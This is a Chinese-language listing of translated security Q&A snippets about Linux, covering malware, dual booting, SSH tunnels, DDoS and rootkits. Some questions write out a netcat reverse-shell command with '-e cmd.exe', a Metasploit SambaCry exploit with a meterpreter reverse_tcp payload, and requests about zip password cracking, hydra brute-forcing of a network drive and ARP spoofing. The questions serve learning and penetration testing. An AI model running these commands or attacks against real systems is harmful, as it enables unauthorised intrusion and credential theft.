因此,我下载了用于linux的fcrackzip工具,并尝试使用它来测试我自己的一个.zip文件。但是,唯一的问题是破解密码花了很长时间。那么,在linux中是否有任何设置或类似的设置,可以用来加快这个工具的破解速度?或者更好的是,对于linux或unix,还有更好的工具吗?谢谢。
浏览 0提问于2018-05-13得票数 0
可能重复: unix/linux中的病毒神话
我以前从未使用过Linux,我听说您不需要担心Linux上的恶意软件。所以,正如标题所说,Linux真的安全吗?还是因为Linux不受标准终端用户的欢迎,人们就不用为Linux创建它们了?
浏览 0提问于2012-01-17得票数 1
1回答
是否有任何方法在Linux机器内执行xss攻击以获得sudo模式?我知道Linux是为分离这两种类型的用户而设计的。我想,我不知道,但我想不同的发行版使用不同的ddl语言。
另外:我可以使用C语言来做一个类似的(我知道管理进程在windows上正常用户上工作)脚本,但是对于windows呢?
浏览 0提问于2017-07-11得票数 1
1回答
我的linux电脑上有一些可疑的pdf文件。我在firefox和Evince阅读器中打开它,忘记使用VM或任何其他沙箱。它是否有可能被任何类型的间谍软件感染并感染我的linux机器?
之后,我下载了一个新的linux,并在usb上用unetbootin烧录了它。该病毒是否有可能感染我的新linux安装和我的新机器与任何间谍软件/特洛伊木马?
我如何扫描我的linux机器上的间谍软件?我有所有最新的更新和安装,我的linux定期更新。
浏览 0提问于2016-03-19得票数 0
我使用Linux通过我的Windows运行VMware。我想将Linux用于在线事务。病毒、间谍或蠕虫有可能从Windows主机攻击我的Linux VM吗?我的Linux环境是相同的安全干净Linux安装吗?
浏览 0提问于2015-03-30得票数 1
回答已采纳
我知道反向和绑定shell是什么,以及如何使用netcat/ncat,但我在这里面临的问题(可能是因为我不是英语母语)是这样一句话:“从Windows系统创建一个反向shell到Kali机器
在我看来,这听起来像是必须在Kali机器上打开侦听器,并从Windows机器向Kali提供命令提示符。如下所示:
Linux:nc -nvlp portno --允许WindowsIP -ssl
Windows:nc -nv LinuxIP portno -e cmd.exe --ssl
但我读得越多,(对我)它就越令人困惑。定义,如
“反向外壳是从受害者或目标获取到计算机的连接”
或例如
浏览 2提问于2018-10-13得票数 1
回答已采纳
我想学习在kali linux平台上的渗透测试,因为我发现需要wifi卡。但我的问题是,如果我安装kali linux作为主要操作系统,或者为kali linux和windows分别设置分区,那么是否还需要wifi卡?
浏览 0提问于2016-04-09得票数 -4
在裸金属(主机操作系统)上运行Windows 11的系统上,哪种Linux安装方法更安全?(例如网上银行)。
双靴
Windows 11作为主机,Linux在虚拟盒中。
双重引导:病毒、特洛伊木马等是否有可能从主机传播到Linux双启动系统?
受感染的主机是否也会影响虚拟机?
浏览 0提问于2023-04-01得票数 0
3回答
在我的笔记本电脑上,我有一个非常安全的Linux安装,我希望这样做。它过去有,将来也可能包含我在学习中使用的机密医学数据。我也有一个Windows安装,用于更多的临时使用(游戏,下载资料分机)。是否有可能通过windows分区黑入我的linux安装?这既可用于直接访问数据,也可用于在Linux可能找到数据并运行它的地方安装程序。
浏览 0提问于2014-10-01得票数 7
我在msfconsole上使用这个漏洞来利用samba来利用VM,配置如下:
Module options (exploit/linux/samba/sambacry)
Payload options (linux/x64/meterpreter/reverse_tcp)
2 Linux x86_64 -> target
还设置了rhost、rport、lhost和lport。
我在一个aws ec2实例上在kali上运行了该漏洞。每个VM都位于不同的子网络中,但我可以使用它们各自的私有ip地址来交互。
这两个VM都没有防火墙(安全组已锁定,允许所有入站和出站通信)。
对于ubunt
浏览 0提问于2018-08-28得票数 0
1回答
我正在为Linux存储库开发本地服务器。我们一直在使用没有SSL验证的HTTPS来建立服务器和代理之间的连接。在关闭SSL验证时使用HTTPS与使用普通的旧HTTP真的有什么区别吗?
浏览 0提问于2018-06-27得票数 1
2017年1月发现了一种影响Linux用户的新木马。它叫Linux.Proxy.10
这里有一篇关于它的技术文章:
https://www.socpedia.com/linux-proxy-10-trojan-infects-a-few-thousand-linux-machines-and-turns-them-into-proxy-servers
我的问题如下:
在默认情况下,Ubuntu16.10似乎没有安装OpenSSH,这是否正确(除非我做了一个命令错误)?
如果在默认情况下Ubuntu16.10没有安装OpenSSH命令,我是否需要担心一些黑客/ bot?
Ubuntu16.10默
浏览 0提问于2017-01-27得票数 0
想象一下这样的情景:
攻击者拥有对计算机的管理权限(无论是Windows、macOS还是流行的Linux系统)
防御者是典型的使用者(不坏也不坏)
目标是读取通常通过TLS加密的敏感数据(例如stackexchange登录)
不允许在UI中进行太大的更改(例如,如果浏览器这样说,维护者不会在“可疑”的网站上运行)
浏览 0提问于2018-01-22得票数 -3
1回答
我在Kali Linux和Ubuntu12.04中使用Virtualbox内部网络。Ubuntu的OpenSSL版本为1.0.1,应该是易受攻击的。我在Ubuntu上使用nginx创建了一个HTTPS服务器,当我在Kali Linux上用nmap进行扫描时,它显示出http的端口80和https的端口443是打开的。但是,当我在Kali中的Metasploit上使用Heart血液漏洞并运行check命令时,它说:
[*] 192.168.1.70:443 The target is not exploitable
[*] Checked 1 of 1 hosts (100% complete)
浏览 0提问于2016-12-17得票数 0
回答已采纳
我知道转发端口会增加一些安全风险,但是如果我将一个端口转发到一台计算机,比如运行linux,它会给我网络上的所有计算机增加安全风险吗?
浏览 0提问于2014-04-14得票数 1
1回答
我刚从第三方那里得到一个Linux服务器。然后通过SecureCRT:https://www.vandyke.com/support/tips/socksproxy.html创建一个SSH隧道,其中将Linux服务器用作网关服务器。
然而,Linux服务器并不是100%安全的,因为它是由第三方管理的.现在,如果我通过SSH隧道连接到HTTPS服务器,那么发送给HTTPS服务器的密码会被Linux服务器的管理员窃取吗?
浏览 0提问于2017-01-20得票数 3
2回答
我正在寻找帮助阻止DOS攻击的方法。我正在运行一个linux服务器,并寻找方法可以帮助限制任何攻击的效果,并可能在不影响任何事情的情况下设置一些限制。
谢谢
浏览 0提问于2012-03-20得票数 0
我花了(太多)时间试图让mariadb连接器使用我自己的代码。MySQL C连接器运行良好,但我决定迁移到mariadb。
最后,我决定尝试一个最小的代码,以检查问题是否与我的代码或环境,我得到了同样的错误。代码来自SO:上的这个问题。
#include <my_global.h>
#include <mysql.h>
int main(int argc, char **argv)
{
MYSQL *con = mysql_init(NULL);
if (con == NULL)
{
fprintf(stderr, "%s\n&
浏览 3提问于2015-03-17得票数 4
1回答
我在我们的RedHat Linux平台上看到,"java“进程依赖于glibc库:
[root@hpproliant1 ~]# ldd /usr/bin/java
linux-gate.so.1 => (0xffffe000)
libpthread.so.0 => /lib/libpthread.so.0 (0xf7f77000)
libjli.so => /usr/java/32bit/jre1.6.0_26/bin/../lib/i386/jli/libjli.so (0xf7f6e000)
libdl.so.2 => /lib/libdl.so.2 (0
浏览 0提问于2015-01-30得票数 10
2回答
我对学习系统安全很感兴趣。我正在考虑在我的一台空闲机器上安装Damn Vulnerable Linux进行测试。有人有什么建议,阅读,方法或教程吗?
浏览 1提问于2011-05-14得票数 4
回答已采纳
Linux屏幕储存柜看起来不太安全,至少在过去的1,2,3中是这样的。但是有什么非常安全的OpenBSD屏幕储物柜吗?
(或者OpenBSD使用与Linux相同的桌面相关源代码,因此会有类似的问题吗?)
理想情况下,我希望能够让我的笔记本电脑无人值守,并且知道几分钟后,它会自动锁定屏幕,这样它就会变得很安全,就像笔记本电脑已经关机,全磁盘加密了一样(所有磁盘都包括交换)。用OpenBSD和屏幕储物柜可以做到这一点吗?或者我必须配置笔记本电脑才能真正关掉电源?
1:https://news.ycombinator.com/item?id=3484859
2:http://www.h-onlin
浏览 0提问于2016-05-14得票数 6
回答已采纳
某些rootkits攻击的工作方式是在格式列表中插入新的二进制格式,并向内核提供恶意处理程序,该处理程序会在每次调用内核时返回错误代码ENOEXEC。因为新的处理程序被插入在格式列表的头部,所以恶意处理程序在每次新进程被executed.The时被执行。在系统启动之后,列表的大小是恒定的,并且仅当安装了新的二进制格式时才改变。当此攻击插入新的二进制格式时,它会更改格式列表的长度。我在一篇文章中读到过这一点。我想知道这在内核3中也是真的吗?如果是,我如何检查格式列表的长度?我在内核3.11.4中发现了这个结构:
/*
* This structuredefines the function
浏览 6提问于2013-11-16得票数 1
3回答
我在我日常使用的笔记本电脑上运行linux (特别是Debian 9),其中系统的磁盘是加密的,所以每当我启动它时,都需要密码才能进入系统。在这种情况下,设置getty以根权限自动登录用户(sudoer,而sudo不需要密码)安全吗?有可能的攻击者有可能进入系统吗?
浏览 0提问于2018-10-14得票数 2
我有一个linux网络主机服务器,它吸引DDOS攻击。我想使用Cisco ASA 5500系列自适应安全装置来保护linux服务器免受它们的攻击。我知道在您选择合适的硬件防火墙之前,应该知道很多因素,比如这个DDOS和pps ..etc的数量。
请建议一个linux工具来测量这些因素,并帮助我收集所需的信息( pps - DDOS的数量-并发连接和其他因素)。
浏览 0提问于2012-06-04得票数 1
回答已采纳
1回答
Linux CentOS - Apache
上周,我的服务器遭遇了SYN攻击,我的主机提供商采取了一些措施解决了这个问题。他们所做的事情之一就是打开。我知道所有的交通都来自南美洲。
我的问题是:知道攻击来自哪个国家,是否可以通过在我的.htaccess文件中阻止那个国家来抵御攻击?还是在.htaccess出现之前,攻击发生在较低的级别?
浏览 0提问于2012-10-14得票数 1
回答已采纳
2回答
我将要提出的问题与以下问题相似:
如果系统管理程序已被修补,并且我信任客人,我是否需要为崩溃/幽灵修补Linux?
不过,我想进一步或更深入地探讨这个问题。
考虑以下环境,其中UCS虚拟化层托管VMware ESXi实例,这些实例本身将承载Windows、Linux和其他OSes,为了保护底层,我应该保护哪一层?
-> Hardware
-> CPU
-> RAM
-> Mainboard
-> Storage
-> Operating System (UCS Management)
-> part
浏览 0提问于2018-01-10得票数 4
4回答
显示在运行时链接共享库的内存地址。
$ cat one.c
#include<stdio.h>
int main() {
printf ("%d", 45);
}
$ gcc one.c -o one -O3
$ ldd one
linux-gate.so.1 => (0x00331000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0x00bc2000)
/lib/ld-linux.so.2 (0x006dc000)
$
从到另一个问题
...地址基本上是随机数。在设计
浏览 7提问于2010-10-20得票数 2
显然,地狱终于完全冻结了:下一次针对Windows 10的重大更新将能够实现本地运行 Bash、相关工具,甚至是Ubuntu存储库中的一些更广泛的Linux二进制文件/程序。
在迄今公布的技术信息上,今年夏天的更新将把Linux子系统组件添加到Windows中,在此基础上将放置一个来自Ubuntu用户模式组件规范的特殊图像。子系统组件将Linux系统调用转换为Windows系统调用。(本质上,这是一种类似仿真器的情况。)Bash、ssh、apt和其他组件将在本机运行,但规范说也将运行,“Ubuntu存档中提供的数万个二进制包中的大多数”。包括apache和MySQL之类的东西。
好吧,这让我想
浏览 0提问于2016-03-31得票数 6
1回答
为什么漏洞扫描器忽略共享库?
、、、、
首先,我对漏洞扫描很陌生,并且没有使用容器特定工具之外的任何工具的经验。所以,我不知道这是不是扫描仪的正常行为。如果我错了,请纠正我,但以下几点对我来说似乎是个问题:
我下载了来自码头枢纽的特使代理的基本映像,并使用3种不同的扫描器(Twistlock、Trivy和Snyk)运行漏洞扫描。结果显示出了许多不同级别的漏洞。但是,我想关注gnu中的这4个问题(都是低级线程,但对于上下文并不重要):
CVE-2020-27618
CVE-2021-3326
CVE-2020-6096
CVE-2016-10739
我查找了特使可执行文件的所有共享库依赖项。
root@ee5974211008:/#
浏览 0提问于2021-08-17得票数 0
回答已采纳
1回答
根据排除或显示未运行Linux内核的漏洞.:
在单个Linux主机上检测到多个内核是可能的,Qualys将报告在所有Linux内核上发现的所有漏洞。
Linux发行版支持多个内核版本的并行安装。在安装新内核时,会自动创建一个引导项和一个initrd,因此不需要进一步的手动配置。那么,我是否真的需要关注为旧安装的内核发现的漏洞(实际上,这些漏洞并不用于引导系统)?有风险吗?我的意思是,当然有人可能会争辩说,一旦有人访问了服务器,他/她就可以引导到一个较旧的(如果你愿意的话更易受攻击)安装的内核版本,但这首先需要根权限。
浏览 0提问于2021-01-22得票数 1
回答已采纳
2回答
如果对Linux服务器上的许多密码使用相同的SALT,那么这在安全方面有什么风险呢?
这是否意味着,用户(可以更改自己的密码)可以计算其他用户的密码?
还是野蛮人仍然需要强迫彩虹桌?
浏览 0提问于2012-02-14得票数 6
回答已采纳
深入了解其他Linux机器的最好方法是编辑grub。
许多人将首先在启动期间将行ro quite splash编辑为rw init=/bin/bash (通常按下列表上的e按钮)。第二是使用恢复模式。
为了保护我的Linux操作系统,我做了两件事:
设置粗食密码
恢复模式被禁用。
在完成这两个步骤之后,是否可以绕过grub2来破解Linux用户密码?
浏览 0提问于2016-02-13得票数 1
回答已采纳
如何在局域网上野蛮地执行windows映射的网络驱动器?我已经知道一半的密码,并创建了一个字表与紧缩。我不知道如何使用hydra或其他在kali linux上可用的脚本来强行执行它。我的问题是,如何将hydra直接指向映射驱动器( ex /192.168.2.9)?
浏览 0提问于2017-07-27得票数 0
回答已采纳
1回答
假设一个普通的linux机器被获得根shell的攻击者破坏,他可以修改系统内核或修改引导加载程序来加载另一个内核。
是否有办法防止这种修改?
我想在普通pc上安装只有一个普通硬盘的普通linux操作系统(而不是容器)时禁用这些功能。我不想使用像cdrom这样的只读媒体。
一个粗略的理论解决方案是修补内核,不允许修改MBR和另一个硬盘区域(可能是分区),并在该区域存储内核和引导加载程序文件。
浏览 0提问于2018-12-02得票数 1
2回答
想象一下,用户下载并在他们的受损Linux系统上刻录安装USB棒。是否有任何已知的恶意软件能够通过Linux发行版传播安装媒体,以便在重新安装后系统仍然通过安装媒体受到危害?还是很难实现自动化,更难成为目标攻击的对象?
浏览 0提问于2018-11-28得票数 3
回答已采纳
我一直在研究overlayroot作为一种策略,以帮助我的项目“处于保密状态”。
在Linux系统上安装overlayroot可以使他们的硬盘只读,并且完全在内存中运行他们的Linux操作系统。
我已经安装了overlayroot,并且总是在tmpfs模式下引导。我使用dm-地窖创建了两个加密分区,一个用于联机,另一个用于脱机使用。我使用我的在线研究和社交网络。我用我的线下进行专有工作。如果我需要从在线切换到离线活动,我总是重新启动。如果我已经在线或将要上网,我将重新启动之前,我打开我的离线驱动器。
使用overlayroot是一种更安全的使用互联网的方式吗?是或否,请解释哪些漏洞已处理或未处
浏览 0提问于2017-01-07得票数 0
我是一名专业的DevOps工程师,但在Linux上是个新手.我想在Linux中获得更深层次的知识,请提出建议。
浏览 0提问于2019-12-04得票数 1
我在一个128 is的外部闪存盘上安装了Kali Linux。我想和我的朋友一起建一台PC,但我不知道该安装哪个操作系统。我希望能够玩游戏,我知道我搜索的部件非常快,我也知道Windows是最适合它的。但我也意识到,与Linux和MacOS相比,Windows是最脆弱的操作系统。我知道MacOS是安全的,因为SIP (系统完整性保护)和其他我不知道存在的特性。我的问题是,即使Kali Linux插上电源,而主要操作系统是“睡眠”,你的其他操作系统也有可能被黑吗?如果是这样的话,那么我宁愿在与MacOS的游戏中拥有安全性。但是如果不是的话,我会继续使用Windows来娱乐。
浏览 0提问于2021-01-11得票数 2
回答已采纳
1回答
最近,我通过进入单用户模式,通过GRUB遇到了Linux密码更改方法。在深入研究之后,我发现了一些关于如何使用sha512哈希password.While来保护它的文章--这听起来是保护GRUB的一个很好的选择--我还读到,您可以使用Linux安装来修改它。
那么,如何以不能通过使用Linux安装来修改或删除密码的方式来保护密码呢?
浏览 0提问于2022-05-30得票数 0
回答已采纳
1回答
较小的密码列表
、、、
我在airmon上破解了kali linux上的wifi密码,我总是使用压缩的密码列表,但是列表总是太长(我指的是<100 PT),我想知道是否有一个结果相同的解决方案,但大小很小。
浏览 0提问于2020-11-21得票数 0
在我们的Linux机器上,我们找到了/etc/hosts文件的以下内容:
127.0.0.1 localhost
# *********��������Ϊ360��ȫ��ʿΪ��������ľ����������******************
127.0.0.1 yu.8s7.net
127.0.0.1 1.jopanqc.com
127.0.0.1 2.joppnqq.com
...
...
该文件中有20多行类似的行。
这是什么?这是一次袭击吗?
谢谢你的任何想法。
Zlaja
浏览 8提问于2014-02-10得票数 0
我想用SSH远程登录到我的Linux服务器。公钥/私钥身份验证比密码身份验证更安全,因此我在Linux服务器上禁用了基于密码的SSH身份验证。
现在,我仍然需要提供一个密码来解锁我的SSH私钥。为了节省我不得不记住另一个密码,我可以在SSH私钥和Linux服务器登录上使用相同的密码吗?
在我的例子中,客户端是TrueCrypt卷上的Windows 7。请说明这对你的回答是否重要。
浏览 0提问于2012-02-15得票数 7
4回答
我有一个用Apache在Linux上运行的网站。我可以在访问日志文件中看到几个IP地址,试图访问一些常见的、众所周知的应用程序,比如PhpMyAdmin,如果找到服务器,可能会对服务器进行黑客攻击。
当然,我没有公开的phpmyadmin,但我想知道如何防止这种攻击。也许在linux下有一个工具能够检测到这一点并自动阻止IP入口?也许另一个工具可以在检测到邮件时自动发送给我。
这方面的最新进展是什么?
谢谢你的帮助。
浏览 0提问于2012-11-29得票数 1
1回答
Linux上的Sudo和Opendoas使用时间戳文件来跟踪上次输入密码已经有多长时间了。BSD上的Doas使用内核特性代替。
为什么后者被认为更安全?
浏览 0提问于2021-11-20得票数 2
回答已采纳
我正在研制一个Linux驱动的消费类电子产品。用户与之交互的所有东西都是以root方式运行的(遗留设计)。是否应该限制应用程序作为自己的用户运行?
浏览 0提问于2019-09-06得票数 2
回答已采纳
今日俄罗斯报道(2016年年1月20日)表示,有一个新的零天漏洞已经被发现影响到Linux和所有基于Linux的电脑和手机OSes。
交易是什么?它对Ubuntu有什么影响?我们什么时候可以期待安全更新来弥补这个安全漏洞?
浏览 0提问于2016-01-20得票数 16
在我的linux服务器中,有如此多的tcp连接处于“关闭”状态,netstat结果如下:
tcp 1 61 local-ip:3306 remote-ip:11654 CLOSING -
如何关闭这些连接?本地进程已重新启动,因此我找不到pids。
我重新启动了网络,但没有使用。
我无法重新启动服务器,因为有服务正在运行。
非常感谢!
浏览 4提问于2011-07-27得票数 1
1回答
我目前正试图使用Virtualbox中的Kali Linux进行ARP欺骗/ARP中毒,以检查我公司网络的安全性。我现在做了一个小五倍,所以我被允许这样做。我想在笔记本电脑和路由器之间找到一个中间位置。因此,假设我使用的是以下内容:
带有外部USB适配器IP: 192.0.0.3 | MAC: CC:CC:CC:CC:CC:CC的Virtualbox中的Kali Linux
使用Windows 10 IP: 192.0.0.2 | MAC: BB:BB:BB:BB:BB:BB的目标笔记本电脑
默认网关IP: 192.0.0.1 | MAC: AA:AA:AA:AA:AA:AA
因此,我尝试了一
浏览 0提问于2020-04-27得票数 2
回答已采纳
因此,我最近转向了Ubuntu,这是伟大的,虽然很多工作来自于仅仅使用windows多年的开源平流层。现在我试着重新定位自己,基本上重新学习如何使用计算机。
我是个大玩家,因为这个原因,我一直在考虑双引导窗口(done,playforlinux),然而,让我转向Linux的最大原因之一是windows中的大量安全漏洞(最近的那些漏洞巩固了我的信念,我做出了一个很好的选择)。
现在,我最大的问题是,双引导窗口是否损害了安全性,并基本上取消了切换到Linux的主要原因之一?Windows后门和漏洞(包括基于政府和基于单个角色的)是否意味着我的Linux引导和分区同样不安全?
任何一个新的转变的洞察
浏览 0提问于2017-05-23得票数 1
1回答
在一个非国际论坛上,我读到了关于在Linux桌面上使用反病毒的讨论。有两种意见:
1. Anti-Virus is best-practise regardless of the OS used
2. Anti-Virus on Linux does more harm than good
现在大多数的答案都是基于基本观点的。然而,一个不断被使用的论点是,在Linux上拥有一个AV是真正的危险,因为它必须作为root运行。我个人不明白为什么这本身就是这么大的安全风险,假设你安装了一个“合法”的杀毒软件。我很难用“事实”来区分关于Linux的风险的观点。
在Linux桌面上安装AV的真正风险是什
浏览 0提问于2018-06-21得票数 2
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
实时音视频
对象存储
即时通信 IM活动推荐
腾讯云开发者
